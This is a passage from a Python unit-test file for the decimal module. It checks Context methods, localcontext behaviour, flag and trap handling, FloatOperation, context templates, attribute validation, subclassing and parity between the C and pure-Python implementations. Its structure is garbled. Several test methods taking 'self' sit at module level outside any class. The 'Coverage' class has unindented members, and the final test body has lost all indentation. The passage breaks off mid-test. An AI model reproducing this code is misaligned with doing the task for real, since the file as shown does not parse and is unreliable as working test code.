    for a, b in ((1, 4), (Decimal(1), 4), (1, Decimal(4)),
                 (Decimal(1), Decimal(4))):
        self.assertEqual(ctx.power(a, b), want)
    self.assertRaises(TypeError, ctx.power, '1', 4)
    self.assertRaises(TypeError, ctx.power, 1, '4')
    # three-argument (modular) form, called entirely by keyword
    self.assertEqual(ctx.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
    """Context.quantize coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.quantize(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.quantize(a, b), want)
    self.assertRaises(TypeError, ctx.quantize, '1', 2)
    self.assertRaises(TypeError, ctx.quantize, 1, '2')
def test_remainder(self):
    """Context.remainder coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.remainder(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.remainder(a, b), want)
    self.assertRaises(TypeError, ctx.remainder, '1', 2)
    self.assertRaises(TypeError, ctx.remainder, 1, '2')
def test_remainder_near(self):
    """Context.remainder_near coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.remainder_near(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.remainder_near(a, b), want)
    self.assertRaises(TypeError, ctx.remainder_near, '1', 2)
    self.assertRaises(TypeError, ctx.remainder_near, 1, '2')
def test_rotate(self):
    """Context.rotate coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.rotate(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.rotate(a, b), want)
    self.assertRaises(TypeError, ctx.rotate, '1', 2)
    self.assertRaises(TypeError, ctx.rotate, 1, '2')
def test_sqrt(self):
    """Context.sqrt accepts an int; a str argument raises TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.sqrt(dec.Decimal(10))
    self.assertEqual(ctx.sqrt(10), want)
    self.assertRaises(TypeError, ctx.sqrt, '10')
def test_same_quantum(self):
    """Context.same_quantum coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.same_quantum(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.same_quantum(a, b), want)
    self.assertRaises(TypeError, ctx.same_quantum, '1', 2)
    self.assertRaises(TypeError, ctx.same_quantum, 1, '2')
def test_scaleb(self):
    """Context.scaleb coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.scaleb(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.scaleb(a, b), want)
    self.assertRaises(TypeError, ctx.scaleb, '1', 2)
    self.assertRaises(TypeError, ctx.scaleb, 1, '2')
def test_shift(self):
    """Context.shift coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.shift(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.shift(a, b), want)
    self.assertRaises(TypeError, ctx.shift, '1', 2)
    self.assertRaises(TypeError, ctx.shift, 1, '2')
def test_subtract(self):
    """Context.subtract coerces int operands like Decimal operands."""
    dec = self.decimal
    Decimal = dec.Decimal
    ctx = dec.Context()
    want = ctx.subtract(Decimal(1), Decimal(2))
    for a, b in ((1, 2), (Decimal(1), 2), (1, Decimal(2))):
        self.assertEqual(ctx.subtract(a, b), want)
    self.assertRaises(TypeError, ctx.subtract, '1', 2)
    self.assertRaises(TypeError, ctx.subtract, 1, '2')
def test_to_eng_string(self):
    """Context.to_eng_string accepts an int; a str argument raises."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.to_eng_string(dec.Decimal(10))
    self.assertEqual(ctx.to_eng_string(10), want)
    self.assertRaises(TypeError, ctx.to_eng_string, '10')
def test_to_sci_string(self):
    """Context.to_sci_string accepts an int; a str argument raises."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.to_sci_string(dec.Decimal(10))
    self.assertEqual(ctx.to_sci_string(10), want)
    self.assertRaises(TypeError, ctx.to_sci_string, '10')
def test_to_integral_exact(self):
    """Context.to_integral_exact accepts an int; a str argument raises."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.to_integral_exact(dec.Decimal(10))
    self.assertEqual(ctx.to_integral_exact(10), want)
    self.assertRaises(TypeError, ctx.to_integral_exact, '10')
def test_to_integral_value(self):
    """Context.to_integral_value accepts an int; bad types raise TypeError."""
    dec = self.decimal
    ctx = dec.Context()
    want = ctx.to_integral_value(dec.Decimal(10))
    self.assertEqual(ctx.to_integral_value(10), want)
    self.assertRaises(TypeError, ctx.to_integral_value, '10')
    # a second positional argument is not accepted
    self.assertRaises(TypeError, ctx.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
    # Run the shared Context-API tests against the C implementation (_decimal).
    decimal = C
class PyContextAPItests(ContextAPItests):
    # Run the shared Context-API tests against the pure-Python implementation.
    decimal = P
class ContextWithStatement(unittest.TestCase):
    # Tests for `with localcontext()`: the block must run under a *copy* of
    # the current (or supplied) context, and the previous context must be
    # restored on exit -- even when intermediate contexts are garbage
    # collected mid-block.
    # Can't do these as docstrings until Python 2.6
    # as doctest can't handle __future__ statements
    def test_localcontext(self):
        # Use a copy of the current context in the block
        getcontext = self.decimal.getcontext
        localcontext = self.decimal.localcontext

        orig_ctx = getcontext()
        with localcontext() as enter_ctx:
            set_ctx = getcontext()
        final_ctx = getcontext()
        self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
        self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
        self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')

    def test_localcontextarg(self):
        # Use a copy of the supplied context in the block
        Context = self.decimal.Context
        getcontext = self.decimal.getcontext
        # NOTE: a duplicated `localcontext = ...` assignment was removed here.
        localcontext = self.decimal.localcontext

        orig_ctx = getcontext()
        new_ctx = Context(prec=42)
        with localcontext(new_ctx) as enter_ctx:
            set_ctx = getcontext()
        final_ctx = getcontext()
        self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
        self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
        self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
        self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')

    def test_nested_with_statements(self):
        # Use a copy of the supplied context in the block
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        getcontext = self.decimal.getcontext
        localcontext = self.decimal.localcontext
        Clamped = self.decimal.Clamped
        Overflow = self.decimal.Overflow

        orig_ctx = getcontext()
        orig_ctx.clear_flags()
        new_ctx = Context(Emax=384)
        with localcontext() as c1:
            # flags/traps of the copy start out equal to the original's
            self.assertEqual(c1.flags, orig_ctx.flags)
            self.assertEqual(c1.traps, orig_ctx.traps)
            c1.traps[Clamped] = True
            c1.Emin = -383
            # mutations of the copy must not leak to the original
            self.assertNotEqual(orig_ctx.Emin, -383)
            self.assertRaises(Clamped, c1.create_decimal, '0e-999')
            self.assertTrue(c1.flags[Clamped])
            with localcontext(new_ctx) as c2:
                self.assertEqual(c2.flags, new_ctx.flags)
                self.assertEqual(c2.traps, new_ctx.traps)
                self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
                self.assertFalse(c2.flags[Clamped])
                self.assertTrue(c2.flags[Overflow])
                del c2
            # the inner block's flags must not leak outward
            self.assertFalse(c1.flags[Overflow])
            del c1
        self.assertNotEqual(orig_ctx.Emin, -383)
        self.assertFalse(orig_ctx.flags[Clamped])
        self.assertFalse(orig_ctx.flags[Overflow])
        self.assertFalse(new_ctx.flags[Clamped])
        self.assertFalse(new_ctx.flags[Overflow])

    def test_with_statements_gc1(self):
        # Deleting the bound name inside the block must not break restoration.
        localcontext = self.decimal.localcontext

        with localcontext() as c1:
            del c1
            with localcontext() as c2:
                del c2
                with localcontext() as c3:
                    del c3
                    with localcontext() as c4:
                        del c4

    def test_with_statements_gc2(self):
        # Each level is seeded from the (subsequently deleted) previous copy.
        localcontext = self.decimal.localcontext

        with localcontext() as c1:
            with localcontext(c1) as c2:
                del c1
                with localcontext(c2) as c3:
                    del c2
                    with localcontext(c3) as c4:
                        del c3
                        del c4

    def test_with_statements_gc3(self):
        # Interleave setcontext() with localcontext() while deleting the
        # template contexts; prec must always reflect the active context.
        Context = self.decimal.Context
        localcontext = self.decimal.localcontext
        getcontext = self.decimal.getcontext
        setcontext = self.decimal.setcontext

        with localcontext() as c1:
            del c1
            n1 = Context(prec=1)
            setcontext(n1)
            with localcontext(n1) as c2:
                del n1
                self.assertEqual(c2.prec, 1)
                del c2
            n2 = Context(prec=2)
            setcontext(n2)
            del n2
            self.assertEqual(getcontext().prec, 2)
            n3 = Context(prec=3)
            setcontext(n3)
            self.assertEqual(getcontext().prec, 3)
            with localcontext(n3) as c3:
                del n3
                self.assertEqual(c3.prec, 3)
                del c3
            n4 = Context(prec=4)
            setcontext(n4)
            del n4
            self.assertEqual(getcontext().prec, 4)
            with localcontext() as c4:
                self.assertEqual(c4.prec, 4)
                del c4
class CContextWithStatement(ContextWithStatement):
    # Run the `with localcontext()` tests against the C implementation.
    decimal = C
class PyContextWithStatement(ContextWithStatement):
    # Run the `with localcontext()` tests against the pure-Python implementation.
    decimal = P
class ContextFlags(unittest.TestCase):
    """Tests for context flag/trap bookkeeping, including FloatOperation."""

    def test_flags_irrelevant(self):
        # check that the result (numeric result + flags raised) of an
        # arithmetic operation doesn't depend on the current flags
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        Rounded = self.decimal.Rounded
        Underflow = self.decimal.Underflow
        Clamped = self.decimal.Clamped
        Subnormal = self.decimal.Subnormal

        def raise_error(context, flag):
            # Set a flag (and honor its trap) in an implementation-neutral
            # way: the C module has no _raise_error helper.
            if self.decimal == C:
                context.flags[flag] = True
                if context.traps[flag]:
                    raise flag
            else:
                context._raise_error(flag)

        context = Context(prec=9, Emin = -425000000, Emax = 425000000,
                          rounding=ROUND_HALF_EVEN, traps=[], flags=[])

        # operations that raise various flags, in the form (function, arglist)
        operations = [
            (context._apply, [Decimal("100E-425000010")]),
            (context.sqrt, [Decimal(2)]),
            (context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
            (context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
            (context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
            ]

        # try various flags individually, then a whole lot at once
        flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
                    [Inexact, Rounded, Underflow, Clamped, Subnormal]]

        for fn, args in operations:
            # find answer and flags raised using a clean context
            context.clear_flags()
            ans = fn(*args)
            flags = [k for k, v in context.flags.items() if v]

            for extra_flags in flagsets:
                # set flags, before calling operation
                context.clear_flags()
                for flag in extra_flags:
                    raise_error(context, flag)
                new_ans = fn(*args)

                # flags that we expect to be set after the operation
                expected_flags = list(flags)
                for flag in extra_flags:
                    if flag not in expected_flags:
                        expected_flags.append(flag)
                expected_flags.sort(key=id)

                # flags we actually got
                new_flags = [k for k,v in context.flags.items() if v]
                new_flags.sort(key=id)

                self.assertEqual(ans, new_ans,
                                 "operation produces different answers depending on flags set: " +
                                 "expected %s, got %s." % (ans, new_ans))
                self.assertEqual(new_flags, expected_flags,
                                 "operation raises different flags depending on flags set: " +
                                 "expected %s, got %s" % (expected_flags, new_flags))

    def test_flag_comparisons(self):
        # SignalDict equality: flags/traps compare by contents, including
        # against plain dicts; dicts with missing keys or junk never compare
        # equal.
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        Rounded = self.decimal.Rounded

        c = Context()

        # Valid SignalDict
        self.assertNotEqual(c.flags, c.traps)
        self.assertNotEqual(c.traps, c.flags)

        c.flags = c.traps
        self.assertEqual(c.flags, c.traps)
        self.assertEqual(c.traps, c.flags)

        c.flags[Rounded] = True
        c.traps = c.flags
        self.assertEqual(c.flags, c.traps)
        self.assertEqual(c.traps, c.flags)

        d = {}
        d.update(c.flags)
        self.assertEqual(d, c.flags)
        self.assertEqual(c.flags, d)

        d[Inexact] = True
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

        # Invalid SignalDict
        d = {Inexact:False}
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

        d = ["xyz"]
        self.assertNotEqual(d, c.flags)
        self.assertNotEqual(c.flags, d)

    @requires_IEEE_754
    def test_float_operation(self):
        # FloatOperation: implicit float->Decimal conversion sets the flag
        # (and raises if trapped); the explicit from_float constructors are
        # always silent, but comparisons against floats still set the flag.
        Decimal = self.decimal.Decimal
        FloatOperation = self.decimal.FloatOperation
        localcontext = self.decimal.localcontext

        with localcontext() as c:
            ##### trap is off by default
            self.assertFalse(c.traps[FloatOperation])

            # implicit conversion sets the flag
            c.clear_flags()
            self.assertEqual(Decimal(7.5), 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            self.assertEqual(c.create_decimal(7.5), 7.5)
            self.assertTrue(c.flags[FloatOperation])

            # explicit conversion does not set the flag
            c.clear_flags()
            x = Decimal.from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])
            # comparison sets the flag
            self.assertEqual(x, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            x = c.create_decimal_from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])
            self.assertEqual(x, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            ##### set the trap
            c.traps[FloatOperation] = True

            # implicit conversion raises
            c.clear_flags()
            self.assertRaises(FloatOperation, Decimal, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            self.assertRaises(FloatOperation, c.create_decimal, 7.5)
            self.assertTrue(c.flags[FloatOperation])

            # explicit conversion is silent
            c.clear_flags()
            x = Decimal.from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])

            c.clear_flags()
            x = c.create_decimal_from_float(7.5)
            self.assertFalse(c.flags[FloatOperation])

    def test_float_comparison(self):
        # Mixed Decimal/float comparisons set FloatOperation, and raise it
        # when trapped for ordering comparisons (equality stays silent).
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        FloatOperation = self.decimal.FloatOperation
        localcontext = self.decimal.localcontext

        def assert_attr(a, b, attr, context, signal=None):
            # Call a.<attr>(b); expect a raise if `signal` is the trap,
            # otherwise a True result -- and the flag set either way.
            context.clear_flags()
            f = getattr(a, attr)
            if signal == FloatOperation:
                self.assertRaises(signal, f, b)
            else:
                self.assertIs(f(b), True)
            self.assertTrue(context.flags[FloatOperation])

        small_d = Decimal('0.25')
        big_d = Decimal('3.0')
        small_f = 0.25
        big_f = 3.0

        zero_d = Decimal('0.0')
        neg_zero_d = Decimal('-0.0')
        zero_f = 0.0
        neg_zero_f = -0.0

        inf_d = Decimal('Infinity')
        neg_inf_d = Decimal('-Infinity')
        inf_f = float('inf')
        neg_inf_f = float('-inf')

        def doit(c, signal=None):
            # Order
            for attr in '__lt__', '__le__':
                assert_attr(small_d, big_f, attr, c, signal)

            for attr in '__gt__', '__ge__':
                assert_attr(big_d, small_f, attr, c, signal)

            # Equality
            assert_attr(small_d, small_f, '__eq__', c, None)

            assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
            assert_attr(neg_zero_d, zero_f, '__eq__', c, None)

            assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
            assert_attr(zero_d, zero_f, '__eq__', c, None)

            assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
            assert_attr(inf_d, inf_f, '__eq__', c, None)

            # Inequality
            assert_attr(small_d, big_f, '__ne__', c, None)

            assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)

            assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
            assert_attr(inf_d, neg_inf_f, '__ne__', c, None)

            assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)

        def test_containers(c, signal=None):
            # Container operations compare by equality/hashing and so also
            # set the flag (and raise while sorting, which orders).
            c.clear_flags()
            s = set([100.0, Decimal('100.0')])
            self.assertEqual(len(s), 1)
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            if signal:
                self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
            else:
                s = sorted([10.0, Decimal('10.0')])
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            b = 10.0 in [Decimal('10.0'), 1.0]
            self.assertTrue(c.flags[FloatOperation])

            c.clear_flags()
            b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
            self.assertTrue(c.flags[FloatOperation])

        nc = Context()
        with localcontext(nc) as c:
            self.assertFalse(c.traps[FloatOperation])
            doit(c, signal=None)
            test_containers(c, signal=None)

            c.traps[FloatOperation] = True
            doit(c, signal=FloatOperation)
            test_containers(c, signal=FloatOperation)

    def test_float_operation_default(self):
        # FloatOperation is off by default and survives clear_traps()
        # followed by explicit re-enabling alongside other traps.
        Decimal = self.decimal.Decimal
        Context = self.decimal.Context
        Inexact = self.decimal.Inexact
        FloatOperation= self.decimal.FloatOperation

        context = Context()
        self.assertFalse(context.flags[FloatOperation])
        self.assertFalse(context.traps[FloatOperation])

        context.clear_traps()
        context.traps[Inexact] = True
        context.traps[FloatOperation] = True
        self.assertTrue(context.traps[FloatOperation])
        self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
    # Run the flag/trap tests against the C implementation.
    decimal = C
class PyContextFlags(ContextFlags):
    # Run the flag/trap tests against the pure-Python implementation.
    decimal = P
class SpecialContexts(unittest.TestCase):
    """Test the context templates."""

    def test_context_templates(self):
        # BasicContext/ExtendedContext are module-global templates:
        # setcontext() must install a *copy*, and mutating a template's prec
        # must be visible through that copy.  The templates are restored in
        # the finally block so other tests are unaffected.
        BasicContext = self.decimal.BasicContext
        ExtendedContext = self.decimal.ExtendedContext
        getcontext = self.decimal.getcontext
        setcontext = self.decimal.setcontext
        InvalidOperation = self.decimal.InvalidOperation
        DivisionByZero = self.decimal.DivisionByZero
        Overflow = self.decimal.Overflow
        Underflow = self.decimal.Underflow
        Clamped = self.decimal.Clamped

        assert_signals(self, BasicContext, 'traps',
            [InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
        )

        savecontext = getcontext().copy()
        basic_context_prec = BasicContext.prec
        extended_context_prec = ExtendedContext.prec

        # an exception raised inside try is re-raised after cleanup so the
        # templates and thread context are always restored first
        ex = None
        try:
            BasicContext.prec = ExtendedContext.prec = 441
            for template in BasicContext, ExtendedContext:
                setcontext(template)
                c = getcontext()
                self.assertIsNot(c, template)
                self.assertEqual(c.prec, 441)
        except Exception as e:
            ex = e.__class__
        finally:
            BasicContext.prec = basic_context_prec
            ExtendedContext.prec = extended_context_prec
            setcontext(savecontext)
        if ex:
            raise ex

    def test_default_context(self):
        # DefaultContext seeds *new* thread contexts only: changing its prec
        # must not affect the already-installed context, but must show up
        # after setcontext(DefaultContext).
        DefaultContext = self.decimal.DefaultContext
        BasicContext = self.decimal.BasicContext
        ExtendedContext = self.decimal.ExtendedContext
        getcontext = self.decimal.getcontext
        setcontext = self.decimal.setcontext
        InvalidOperation = self.decimal.InvalidOperation
        DivisionByZero = self.decimal.DivisionByZero
        Overflow = self.decimal.Overflow

        self.assertEqual(BasicContext.prec, 9)
        self.assertEqual(ExtendedContext.prec, 9)

        assert_signals(self, DefaultContext, 'traps',
            [InvalidOperation, DivisionByZero, Overflow]
        )

        savecontext = getcontext().copy()
        default_context_prec = DefaultContext.prec

        ex = None
        try:
            c = getcontext()
            saveprec = c.prec

            DefaultContext.prec = 961
            c = getcontext()
            self.assertEqual(c.prec, saveprec)

            setcontext(DefaultContext)
            c = getcontext()
            self.assertIsNot(c, DefaultContext)
            self.assertEqual(c.prec, 961)
        except Exception as e:
            ex = e.__class__
        finally:
            DefaultContext.prec = default_context_prec
            setcontext(savecontext)
        if ex:
            raise ex
class CSpecialContexts(SpecialContexts):
    # Run the context-template tests against the C implementation.
    decimal = C
class PySpecialContexts(SpecialContexts):
    # Run the context-template tests against the pure-Python implementation.
    decimal = P
class ContextInputValidation(unittest.TestCase):
    """Invalid values/types for Context attributes and constructor args."""

    def test_invalid_context(self):
        Context = self.decimal.Context
        DefaultContext = self.decimal.DefaultContext

        c = DefaultContext.copy()

        # prec, Emax
        for attr in ['prec', 'Emax']:
            setattr(c, attr, 999999)
            self.assertEqual(getattr(c, attr), 999999)
            self.assertRaises(ValueError, setattr, c, attr, -1)
            self.assertRaises(TypeError, setattr, c, attr, 'xyz')

        # Emin
        setattr(c, 'Emin', -999999)
        self.assertEqual(getattr(c, 'Emin'), -999999)
        self.assertRaises(ValueError, setattr, c, 'Emin', 1)
        self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))

        # rounding: must be one of the rounding-mode strings
        self.assertRaises(TypeError, setattr, c, 'rounding', -1)
        self.assertRaises(TypeError, setattr, c, 'rounding', 9)
        self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
        self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')

        # capitals, clamp
        for attr in ['capitals', 'clamp']:
            self.assertRaises(ValueError, setattr, c, attr, -1)
            self.assertRaises(ValueError, setattr, c, attr, 2)
            self.assertRaises(TypeError, setattr, c, attr, [1,2,3])

        # Invalid attribute
        self.assertRaises(AttributeError, setattr, c, 'emax', 100)

        # Invalid signal dict
        self.assertRaises(TypeError, setattr, c, 'flags', [])
        self.assertRaises(KeyError, setattr, c, 'flags', {})
        self.assertRaises(KeyError, setattr, c, 'traps',
                          {'InvalidOperation':0})

        # Attributes cannot be deleted
        for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
                     'flags', 'traps']:
            self.assertRaises(AttributeError, c.__delattr__, attr)

        # Invalid attributes
        self.assertRaises(TypeError, getattr, c, 9)
        self.assertRaises(TypeError, setattr, c, 9)

        # Invalid values in constructor
        self.assertRaises(TypeError, Context, rounding=999999)
        self.assertRaises(TypeError, Context, rounding='xyz')
        self.assertRaises(ValueError, Context, clamp=2)
        self.assertRaises(ValueError, Context, capitals=-1)
        self.assertRaises(KeyError, Context, flags=["P"])
        self.assertRaises(KeyError, Context, traps=["Q"])

        # Type error in conversion
        self.assertRaises(TypeError, Context, flags=(0,1))
        self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
    # Run the input-validation tests against the C implementation.
    decimal = C
class PyContextInputValidation(ContextInputValidation):
    # Run the input-validation tests against the pure-Python implementation.
    decimal = P
class ContextSubclassing(unittest.TestCase):
    """A Context subclass with keyword-only overrides behaves like Context."""

    def test_context_subclassing(self):
        decimal = self.decimal
        Decimal = decimal.Decimal
        Context = decimal.Context
        Clamped = decimal.Clamped
        DivisionByZero = decimal.DivisionByZero
        Inexact = decimal.Inexact
        Overflow = decimal.Overflow
        Rounded = decimal.Rounded
        Subnormal = decimal.Subnormal
        Underflow = decimal.Underflow
        InvalidOperation = decimal.InvalidOperation

        class MyContext(Context):
            # Subclass whose __init__ only overrides the attributes that are
            # explicitly supplied; None means "keep the base default".
            def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
                               capitals=None, clamp=None, flags=None,
                               traps=None):
                Context.__init__(self)
                if prec is not None:
                    self.prec = prec
                if rounding is not None:
                    self.rounding = rounding
                if Emin is not None:
                    self.Emin = Emin
                if Emax is not None:
                    self.Emax = Emax
                if capitals is not None:
                    self.capitals = capitals
                if clamp is not None:
                    self.clamp = clamp
                if flags is not None:
                    # a list of signals is expanded to a full signal dict
                    if isinstance(flags, list):
                        flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
                    self.flags = flags
                if traps is not None:
                    if isinstance(traps, list):
                        traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
                    self.traps = traps

        # defaults of the subclass match the base class
        c = Context()
        d = MyContext()
        for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
                     'flags', 'traps'):
            self.assertEqual(getattr(c, attr), getattr(d, attr))

        # prec
        self.assertRaises(ValueError, MyContext, **{'prec':-1})
        c = MyContext(prec=1)
        self.assertEqual(c.prec, 1)
        self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)

        # rounding
        self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
        c = MyContext(rounding=ROUND_DOWN, prec=1)
        self.assertEqual(c.rounding, ROUND_DOWN)
        self.assertEqual(c.plus(Decimal('9.9')), 9)

        # Emin
        self.assertRaises(ValueError, MyContext, **{'Emin':5})
        c = MyContext(Emin=-1, prec=1)
        self.assertEqual(c.Emin, -1)
        x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
        self.assertEqual(x, Decimal('0.0'))
        for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
            self.assertTrue(c.flags[signal])

        # Emax
        self.assertRaises(ValueError, MyContext, **{'Emax':-1})
        c = MyContext(Emax=1, prec=1)
        self.assertEqual(c.Emax, 1)
        self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
        # NOTE(review): flag check guarded to the C implementation here -- the
        # two implementations apparently differ on flags after a trapped raise.
        if self.decimal == C:
            for signal in (Inexact, Overflow, Rounded):
                self.assertTrue(c.flags[signal])

        # capitals
        self.assertRaises(ValueError, MyContext, **{'capitals':-1})
        c = MyContext(capitals=0)
        self.assertEqual(c.capitals, 0)
        x = c.create_decimal('1E222')
        self.assertEqual(c.to_sci_string(x), '1e+222')

        # clamp
        self.assertRaises(ValueError, MyContext, **{'clamp':2})
        c = MyContext(clamp=1, Emax=99)
        self.assertEqual(c.clamp, 1)
        x = c.plus(Decimal('1e99'))
        self.assertEqual(str(x), '1.000000000000000000000000000E+99')

        # flags
        self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
        c = MyContext(flags=[Rounded, DivisionByZero])
        for signal in (Rounded, DivisionByZero):
            self.assertTrue(c.flags[signal])
        c.clear_flags()
        for signal in OrderedSignals[decimal]:
            self.assertFalse(c.flags[signal])

        # traps
        self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
        c = MyContext(traps=[Rounded, DivisionByZero])
        for signal in (Rounded, DivisionByZero):
            self.assertTrue(c.traps[signal])
        c.clear_traps()
        for signal in OrderedSignals[decimal]:
            self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
    # Run the subclassing tests against the C implementation.
    decimal = C
class PyContextSubclassing(ContextSubclassing):
    # Run the subclassing tests against the pure-Python implementation.
    decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
    """The C and Python implementations must expose matching public APIs."""

    def test_module_attributes(self):
        # Architecture dependent context limits
        self.assertEqual(C.MAX_PREC, P.MAX_PREC)
        self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
        self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
        self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)

        self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
        self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)

        self.assertEqual(C.__version__, P.__version__)

        self.assertEqual(dir(C), dir(P))

    def test_context_attributes(self):
        # every public Context attribute of C must also exist in P
        x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
        y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
        self.assertEqual(set(x) - set(y), set())

    def test_decimal_attributes(self):
        # every public Decimal attribute of C must also exist in P
        x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
        # BUG FIX: y previously used C.Decimal(9) as well, making this test
        # compare the C implementation against itself (always vacuously true).
        y = [s for s in dir(P.Decimal(9)) if '__' in s or not s.startswith('_')]
        self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
    """adjusted() of a finite value; NaN and infinity currently give 0."""
    Decimal = self.decimal.Decimal
    cases = (
        ('1234e9999', 10002),
        # XXX raise?
        ('nan', 0),
        ('inf', 0),
    )
    for literal, expected in cases:
        self.assertEqual(Decimal(literal).adjusted(), expected)
def test_canonical(self):
    """canonical() via both the Decimal method and the context method."""
    dec = self.decimal
    nine = dec.Decimal(9)
    self.assertEqual(nine.canonical(), 9)
    self.assertEqual(dec.getcontext().canonical(nine), 9)
def test_context_repr(self):
    # repr(Context) must render every attribute, with cleared flags/traps
    # shown as empty lists; the expected string is matched exactly.
    c = self.decimal.DefaultContext.copy()

    c.prec = 425000000
    c.Emax = 425000000
    c.Emin = -425000000
    c.rounding = ROUND_HALF_DOWN
    c.capitals = 0
    c.clamp = 1
    for sig in OrderedSignals[self.decimal]:
        c.flags[sig] = False
        c.traps[sig] = False

    s = c.__repr__()
    t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
        "Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
        "flags=[], traps=[])"
    self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
